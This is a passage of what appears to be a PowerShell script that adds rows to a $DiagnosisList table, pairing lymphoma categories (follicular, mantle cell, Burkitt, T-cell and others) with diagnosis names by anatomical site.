limb") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Cutaneous follicle center lymphoma","Cutaneous follicle center lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Other types of follicular lymphoma","Other types of follicular lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, unspecified site") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, spleen") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma, unspecified","Follicular lymphoma, unspecified, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Small cell B-cell lymphoma","Small cell B-cell lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Mantle cell lymphoma","Mantle cell lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Diffuse large B-cell lymphoma","Diffuse large B-cell lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Lymphoblastic (diffuse) lymphoma","Lymphoblastic (diffuse) lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Burkitt lymphoma","Burkitt lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Other non-follicular lymphoma","Other non-follicular lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, unspecified site") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, spleen") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Non-follicular (diffuse) lymphoma, unspecified","Non-follicular (diffuse) lymphoma, unspecified, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, unspecified site") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, spleen") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Mycosis fungoides","Mycosis fungoides, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, unspecified site") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, spleen") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Sezary disease","Sezary disease, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, unspecified site") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, spleen") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Peripheral T-cell lymphoma, not classified","Peripheral T-cell lymphoma, not classified, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, unspecified site") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, spleen") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-positive","Anaplastic large cell lymphoma, ALK-positive, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, unspecified site") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, spleen") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Anaplastic large cell lymphoma, ALK-negative","Anaplastic large cell lymphoma, ALK-negative, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified, unspecified site") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified, spleen") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Cutaneous T-cell lymphoma, unspecified","Cutaneous T-cell lymphoma, unspecified, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, unspecified site") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, spleen") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Other mature T/NK-cell lymphomas","Other mature T/NK-cell lymphomas, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, unspecified site") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, spleen") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Mature T/NK-cell lymphomas, unspecified","Mature T/NK-cell lymphomas, unspecified, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Unspecified B-cell lymphoma","Unspecified B-cell lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Mediastinal (thymic) large B-cell lymphoma","Mediastinal (thymic) large B-cell lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Other specified types of non-Hodgkin lymphoma","Other specified types of non-Hodgkin lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, unspecified site") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, spleen") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Non-Hodgkin lymphoma, unspecified","Non-Hodgkin lymphoma, unspecified, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Other specified types of T/NK-cell lymphoma","Extranodal NK/T-cell lymphoma, nasal type") + $null = $DiagnosisList.Rows.Add("Other specified types of T/NK-cell lymphoma","Hepatosplenic T-cell lymphoma") + $null = $DiagnosisList.Rows.Add("Other specified types of T/NK-cell lymphoma","Enteropathy-type (intestinal) T-cell 